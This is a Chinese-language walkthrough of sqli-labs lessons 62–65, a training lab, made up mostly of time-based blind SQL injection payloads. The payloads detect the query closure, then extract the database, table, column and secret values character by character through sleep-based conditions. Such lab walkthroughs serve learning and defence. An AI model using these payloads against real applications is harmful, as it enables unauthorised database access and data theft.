sqli-labs-master/Less-62~Less-65

Less-62

这一关开始就是使用时间盲注了，并且它规定查130次。

首先，我们判断他的闭合方式。

?id=1')and sleep(3)--%20

页面延时了，说明闭合成功了。

下面我们判断它的数据库名的长度

?id=1')and if(length(database())>10,sleep(1),1)--%20

当长度大于9时，页面延时，大于10时页面不延时，说明数据库的长度为10

?id=1')and if(substr(database(),1,1)='c',sleep(1),1)--%20

截取数据库从第一位开始截取一位，如果是c，则sleep一秒，依次类推，直到判断出数据库的名字为challenges为止。

接下来就是判断表名了。

?id=1')and if(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='m',sleep(3),1)--%20

以此类推，直到判断出表名为止。

接下来爆字段

?id=1')and if(substr((select column_name from information_schema.columns where table_schema='challenges' and table_name='mss5jm6plq' limit 2,1),1,1)='s',sleep(3),1)--%20

下面以此类推，直到判断出需要的字段为止。

下面面爆字段信息

?id=1')and if(substr((select secret_FT6J from mss5jm6plq),1,1)='k',sleep(3),1)--%20

然后，将我们查出来的密钥填到下面。

Less-63

这一关和以前一样，还是先判断闭合

?id=1' and sleep(3)--%20

接下来参考上面即可。

Less-64

?id=1))and sleep(3)--%20

只是闭合方式不同。其他参考上一关即可。

Less-65

?id=1")and sleep(3)--%20